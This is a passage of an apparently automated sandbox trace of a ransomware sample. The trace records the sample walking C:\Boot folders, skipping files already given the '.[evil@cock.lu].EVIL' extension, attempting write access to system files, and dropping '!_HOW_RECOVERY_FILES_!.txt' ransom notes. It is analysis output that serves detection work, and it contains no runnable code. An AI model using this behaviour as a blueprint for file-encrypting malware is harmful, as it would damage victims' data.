hFindFile=0x84b11cd150) returned 1 [0078.104] wcslen (_String="C:\\\\Boot\\it-IT") returned 0xe [0078.104] strlen (_Str="${KEY}") returned 0x6 [0078.104] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0078.104] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0078.104] strlen (_Str="${CODE}") returned 0x7 [0078.104] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0078.104] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.104] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.104] _wfsopen (_FileName="C:\\\\Boot\\it-IT\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0078.263] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0078.263] __uncaught_exception () returned 0x84b1160800 [0078.263] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0078.264] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0078.264] wcsstr (_Str="ja-JP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.264] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ja-JP") returned 14 [0078.264] wcscmp (_String1=".", _String2="ja-JP") returned -1 [0078.264] wcscmp (_String1="..", _String2="ja-JP") returned -1 [0078.264] wcslen (_String="C:\\\\Boot\\ja-JP") returned 0xe [0078.264] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\ja-JP" | out: _Destination="C:\\\\Boot\\ja-JP") returned 0x0 [0078.264] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\ja-JP\\*") returned="C:\\\\Boot\\ja-JP\\*" [0078.264] FindFirstFileW (in: lpFileName="C:\\\\Boot\\ja-JP\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0078.271] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.271] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ja-JP\\.") returned 16 [0078.271] wcscmp (_String1=".", _String2=".") returned 0 [0078.271] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.271] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.271] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ja-JP\\..") returned 17 [0078.271] wcscmp (_String1=".", _String2="..") returned -1 [0078.271] wcscmp (_String1="..", _String2="..") returned 0 [0078.271] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.271] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.271] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui") returned 30 [0078.271] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.271] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0078.271] wcslen (_String="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui") returned 0x1e [0078.271] CreateFileW (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.271] GetLastError () returned 0x5 [0078.271] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.271] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.271] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ja-JP\\memtest.exe.mui") returned 30 [0078.271] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.271] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0078.271] wcslen (_String="C:\\\\Boot\\ja-JP\\memtest.exe.mui") returned 0x1e [0078.271] CreateFileW (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.272] GetLastError () returned 0x5 [0078.272] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0078.272] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0078.272] wcslen (_String="C:\\\\Boot\\ja-JP") returned 0xe [0078.272] strlen (_Str="${KEY}") returned 0x6 [0078.272] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0078.272] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0078.272] strlen (_Str="${CODE}") returned 0x7 [0078.272] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0078.272] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.272] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.272] _wfsopen (_FileName="C:\\\\Boot\\ja-JP\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0078.364] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0078.364] __uncaught_exception () returned 0x84b1160800 [0078.364] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0078.364] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0078.364] wcsstr (_Str="ko-KR", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.364] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ko-KR") returned 14 [0078.364] wcscmp (_String1=".", _String2="ko-KR") returned -1 [0078.364] wcscmp (_String1="..", _String2="ko-KR") returned -1 [0078.364] wcslen (_String="C:\\\\Boot\\ko-KR") returned 0xe [0078.365] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\ko-KR" | out: _Destination="C:\\\\Boot\\ko-KR") returned 0x0 [0078.365] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\ko-KR\\*") returned="C:\\\\Boot\\ko-KR\\*" [0078.365] FindFirstFileW (in: lpFileName="C:\\\\Boot\\ko-KR\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0078.365] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.365] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ko-KR\\.") returned 16 [0078.365] wcscmp (_String1=".", _String2=".") returned 0 [0078.365] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.365] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.365] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ko-KR\\..") returned 17 [0078.365] wcscmp (_String1=".", _String2="..") returned -1 [0078.365] wcscmp (_String1="..", _String2="..") returned 0 [0078.365] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.365] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.365] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui") returned 30 [0078.365] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.365] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0078.365] wcslen (_String="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui") returned 0x1e [0078.365] CreateFileW (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.379] GetLastError () returned 0x5 [0078.379] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.379] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.379] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\ko-KR\\memtest.exe.mui") returned 30 [0078.379] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.379] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0078.379] wcslen (_String="C:\\\\Boot\\ko-KR\\memtest.exe.mui") returned 0x1e [0078.379] CreateFileW (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.379] GetLastError () returned 0x5 [0078.379] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0078.380] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0078.380] wcslen (_String="C:\\\\Boot\\ko-KR") returned 0xe [0078.380] strlen (_Str="${KEY}") returned 0x6 [0078.380] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0078.380] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0078.380] strlen (_Str="${CODE}") returned 0x7 [0078.380] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0078.380] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.380] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.380] _wfsopen (_FileName="C:\\\\Boot\\ko-KR\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0078.403] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0078.403] __uncaught_exception () returned 0x84b1160800 [0078.403] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0078.404] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0078.404] wcsstr (_Str="lt-LT", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.404] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\lt-LT") returned 14 [0078.404] wcscmp (_String1=".", _String2="lt-LT") returned -1 [0078.404] wcscmp (_String1="..", _String2="lt-LT") returned -1 [0078.404] wcslen (_String="C:\\\\Boot\\lt-LT") returned 0xe [0078.404] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\lt-LT" | out: _Destination="C:\\\\Boot\\lt-LT") returned 0x0 [0078.404] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\lt-LT\\*") returned="C:\\\\Boot\\lt-LT\\*" [0078.404] FindFirstFileW (in: lpFileName="C:\\\\Boot\\lt-LT\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0078.404] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.404] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\lt-LT\\.") returned 16 [0078.405] wcscmp (_String1=".", _String2=".") returned 0 [0078.405] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.405] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.405] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\lt-LT\\..") returned 17 [0078.405] wcscmp (_String1=".", _String2="..") returned -1 [0078.405] wcscmp (_String1="..", _String2="..") returned 0 [0078.405] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.405] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.405] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui") returned 30 [0078.405] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.405] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0078.405] wcslen (_String="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui") returned 0x1e [0078.405] CreateFileW (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.405] GetLastError () returned 0x5 [0078.405] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0078.405] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0078.405] wcslen (_String="C:\\\\Boot\\lt-LT") returned 0xe [0078.405] strlen (_Str="${KEY}") returned 0x6 [0078.405] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0078.405] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0078.405] strlen (_Str="${CODE}") returned 0x7 [0078.405] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0078.405] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.405] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.405] _wfsopen (_FileName="C:\\\\Boot\\lt-LT\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0078.412] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0078.412] __uncaught_exception () returned 0x84b1160800 [0078.412] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0078.413] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0078.413] wcsstr (_Str="lv-LV", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.413] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\lv-LV") returned 14 [0078.413] wcscmp (_String1=".", _String2="lv-LV") returned -1 [0078.413] wcscmp (_String1="..", _String2="lv-LV") returned -1 [0078.413] wcslen (_String="C:\\\\Boot\\lv-LV") returned 0xe [0078.413] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\lv-LV" | out: _Destination="C:\\\\Boot\\lv-LV") returned 0x0 [0078.413] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\lv-LV\\*") returned="C:\\\\Boot\\lv-LV\\*" [0078.413] FindFirstFileW (in: lpFileName="C:\\\\Boot\\lv-LV\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0078.459] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.459] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\lv-LV\\.") returned 16 [0078.459] wcscmp (_String1=".", _String2=".") returned 0 [0078.460] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.460] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.460] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\lv-LV\\..") returned 17 [0078.460] wcscmp (_String1=".", _String2="..") returned -1 [0078.460] wcscmp (_String1="..", _String2="..") returned 0 [0078.460] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.460] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.460] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui") returned 30 [0078.460] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.460] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0078.460] wcslen (_String="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui") returned 0x1e [0078.460] CreateFileW (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.460] GetLastError () returned 0x5 [0078.460] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0078.460] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0078.460] wcslen (_String="C:\\\\Boot\\lv-LV") returned 0xe [0078.460] strlen (_Str="${KEY}") returned 0x6 [0078.460] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0078.460] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0078.460] strlen (_Str="${CODE}") returned 0x7 [0078.460] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0078.460] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.460] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.460] _wfsopen (_FileName="C:\\\\Boot\\lv-LV\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0078.461] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0078.461] __uncaught_exception () returned 0x84b1160800 [0078.461] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0078.462] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0078.462] wcsstr (_Str="memtest.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.462] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\memtest.exe") returned 20 [0078.462] wcscmp (_String1="memtest.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.462] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe") returned 0x0 [0078.462] wcslen (_String="C:\\\\Boot\\memtest.exe") returned 0x14 [0078.462] CreateFileW (lpFileName="C:\\\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.462] GetLastError () returned 0x5 [0078.462] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0078.462] wcsstr (_Str="nb-NO", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.462] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\nb-NO") returned 14 [0078.462] wcscmp (_String1=".", _String2="nb-NO") returned -1 [0078.462] wcscmp (_String1="..", _String2="nb-NO") returned -1 [0078.462] wcslen (_String="C:\\\\Boot\\nb-NO") returned 0xe [0078.462] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\nb-NO" | out: _Destination="C:\\\\Boot\\nb-NO") returned 0x0 [0078.462] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\nb-NO\\*") returned="C:\\\\Boot\\nb-NO\\*" [0078.462] FindFirstFileW (in: lpFileName="C:\\\\Boot\\nb-NO\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0078.462] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.462] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\nb-NO\\.") returned 16 [0078.462] wcscmp (_String1=".", _String2=".") returned 0 [0078.462] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.462] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.462] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\nb-NO\\..") returned 17 [0078.462] wcscmp (_String1=".", _String2="..") returned -1 [0078.462] wcscmp (_String1="..", _String2="..") returned 0 [0078.462] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.462] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.463] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui") returned 30 [0078.463] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.463] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0078.463] wcslen (_String="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui") returned 0x1e [0078.463] CreateFileW (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.513] GetLastError () returned 0x5 [0078.513] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0078.513] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.513] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\nb-NO\\memtest.exe.mui") returned 30 [0078.513] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0078.514] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0078.514] wcslen (_String="C:\\\\Boot\\nb-NO\\memtest.exe.mui") returned 0x1e [0078.514] CreateFileW (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0078.514] GetLastError () returned 0x5 [0078.514] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0078.514] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0078.514] wcslen (_String="C:\\\\Boot\\nb-NO") returned 0xe [0078.514] strlen (_Str="${KEY}") returned 0x6 [0078.514] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0078.514] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0078.514] strlen (_Str="${CODE}") returned 0x7 [0078.514] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0078.514] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.514] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0078.514] _wfsopen (_FileName="C:\\\\Boot\\nb-NO\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0078.563] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0078.563] __uncaught_exception () returned 0x84b1160800 [0078.563] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0078.564] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0078.564] wcsstr (_Str="nl-NL", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0078.564] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\nl-NL") returned 14 [0078.564] wcscmp 